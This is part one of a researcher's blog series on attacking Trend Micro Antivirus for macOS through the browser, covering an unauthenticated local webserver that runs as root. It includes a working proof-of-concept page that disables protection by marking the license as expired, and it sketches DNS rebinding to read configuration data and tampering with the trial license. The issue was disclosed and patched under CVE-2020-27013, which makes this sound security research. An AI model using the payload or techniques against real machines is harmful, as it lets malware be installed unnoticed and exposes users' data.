In this 3-part blog post we will take a deep-dive into Trend Micro Antivirus for macOS. In our normal blogs we often detail a single security issue. This time we will dig deeper and look at multiple attack vectors against a single product:
Trend Micro Antivirus offers online security and antivirus protection for macOS devices.
In thist post we will look at attacks from the browser. We will try to attack a client that has Trend Micro Antivirus installed and visits our malicious website. We had two specific attacks in mind:
We did not found any exploits in Trend Micro itself, but did find various other attacks.
Trend Micro installs a local webserver that is running on
127.0.0.1:37847. It uses this for a form of inter-process communication. The webserver is used, for example, to check the expiration status of the license:
[email protected] ~ % curl 'localhost:37848/GetProperty?Expiration' <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>Expiration</key> <string>610581599.000000</string> </dict> </plist>
The webserver is running under
iCoreService process with the
iTISPlugun and is running as root:
[email protected] ~ % sudo lsof | grep 37848 COMMAND PID USER FD TYPE NAME iCoreServ 2890 root 11u IPv4 localhost:37848 (LISTEN)
curl 'localhost:37848/GetProperty?Expiration' reads the Expiration property. Reversing shows that the backing data is stored in a
/Library/Application Support/TrendMicro/Plug-in/iTISPlugin.framework/Versions/A/Resources/TMPlugin.plist. The contents of this file is partially encrypted:
[email protected] ~ % cat TMPlugin.plist <?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"> <plist version="1.0"> <dict> <key>00D62AD3522F12420D3A269CE3752750</key> <string>2150C0B98A8767711DB1FD28470E633C678B5C494924DA53A5AAB9B2BF3DB2279E987B34033F69C52D5CE4DCB2376D85</string> <key>0B6695E9434D90DF02C936E3101FD1FA</key> ... more data
The bug/vulnerability is that users can not only read these properties but also write them. And since the webserver doesn't use authentication, any (malicious) website can modify these settings as well. Some of the (decrypted) settings sound interesting:
__EnableWebThreatProtection__ __EnableScheduledScan__ lastOneDayLaunchDate LastAUTime LicenseStatus __EnableRealTimeScan__ ... many more
It looks like this might allow a trivial bypass of Trend Micro: a malicious website can disable
__EnableWebThreatProtection__ and launch the real attack. However, I think the developers knew this might be a problem and they protected some of the properties. All settings starting with underscores are protected from modification (eg:
__EnableRealTimeScan__). But this blacklist is only for a small number of properties. A malicious website can still modify the remaining properties. Three example attacks are listed below.
Attack 1 mimics a website wants to do something malicious, for example install malware. But the malware would be detected by Trend Micro. Using the insecure webserver the website can disable the AV and stop any protection it provided. It can then continue to install the malware undetected.
As discussed before some of the properties, such as
__EnableRealTimeScan__ are protected from modification. The exploit therefore uses another trick: it sets the license to an expired state.
The following screenshots show a full exploit flow:
Source code of the malicious website:
<html><head><script> var request = new XMLHttpRequest(); request.open("GET", "http://127.0.0.1:37848/SetProperty?LicenseStatus=2"); request.send(); </script></head><body><h1>Malicious website</h1></body></html>
As shown above malicious websites can set properties. But they won’t be able to read them. The browser won’t allow this due to Cross-Origin Resource Sharing (CORS).
An attacker can bypass this by using DNS rebinding. This allows malicious websites to read the data returned by the API. Attackers can then steal configuration information such as the serial number, email address, etc.
Another attack is to change the settings of the trial license. By updating the expiration time any user can extend their trial license into a free full version, resulting in loss of profit for Trend Micro.
These issue was reported to the Zero Day Initiative and are tracked under ZDI-20-1243. It got CVE-2020-27013, and was patched on 2020-10-14. Additional details are available in on Trend Micro's advisory TMKA-09950.
In part 1 of this series we have shown how a malicious website can disable Trend Micro Antivirus before attempting to install malware.
In the next part we will show how a local user can abuse Trend Micro Antivirus to get code execution as root.